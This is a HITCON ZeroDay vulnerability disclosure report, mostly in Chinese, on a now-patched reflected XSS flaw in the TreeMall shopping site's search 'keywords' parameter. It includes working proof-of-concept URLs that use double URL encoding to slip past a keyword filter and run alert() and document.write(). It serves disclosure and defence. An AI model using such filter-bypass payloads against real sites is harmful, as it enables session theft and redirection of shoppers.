TreeMall購物,Reflected Cross-Site Scripting - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2020-00547
  •  發信 Vendor: TreeMall購物網
  • Title: TreeMall購物,Reflected Cross-Site Scripting
  • Introduction: Reflected Cross-Site Scripting

處理狀態

目前狀態

公開
Last Update : 2020/09/09
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2020/06/27 12:48:25 : 新提交 (由 MksYi 更新此狀態)
  • 2020/06/27 12:49:42 : 新提交 (由 MksYi 更新此狀態)
  • 2020/06/27 14:17:38 : 新提交 (由 MksYi 更新此狀態)
  • 2020/06/27 21:19:20 : 新提交 (由 MksYi 更新此狀態)
  • 2020/06/28 01:00:18 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/28 01:00:20 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/29 20:18:06 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/29 20:18:06 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/29 20:18:06 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/08/27 03:00:17 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2020/09/04 19:11:37 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/09/08 20:57:21 : 確認已修補 (由 MksYi 更新此狀態)
  • 2020/09/09 03:00:01 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2020-00547
  • 通報者:MksYi (MksYi)
  • 風險:低
  • 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。

漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.treemall.com.tw/quidditch/treemall

敘述

  1. 發現 keywords 的輸出會置入頁面中 Javascript 之中。 
    https://www.treemall.com.tw/quidditch/treemall
?carrierType=1
&keywords=AAAAAAAAAAAA
&productNum=1
&suggestword=0

    圖片

  2. 嘗試注入 XSS 語法,發現有 HTML Entity,並且發現會過濾掉 script 等...關鍵字。 
    https://www.treemall.com.tw/quidditch/treemall
?carrierType=1
&keywords=AAAAAAAAAAAA'</script>
&productNum=1
&suggestword=0

    圖片

  3. 嘗試使用 URLEncode Bypass,發現可以成功。 
    alert():
https://www.treemall.com.tw/quidditch/treemall?carrierType=1&keywords=%2541%2541%2541%2541%2541%2541%2527%2529%2529%253b%2561%256c%2565%2572%2574%2528%252f%2558%2553%2553%255f%2554%2545%2553%2554%252f%2529%252f%252f&productNum=1&suggestword=0
document.write():
https://www.treemall.com.tw/quidditch/treemall?carrierType=1&keywords=%2541%2541%2541%2541%2541%2541%2527%2529%2529%253b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2577%2572%2569%2574%2565%2528%252f%2558%2553%2553%255f%2554%2545%2553%2554%252f%2529%252f%252f&productNum=1&suggestword=0
  4. 執行畫面截圖
    圖片
    圖片

修補建議

1. 針對所有可控參數進行 HTML Entity
2. 針對特殊符號進行過濾(; , > < } { ) ( / ... )

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;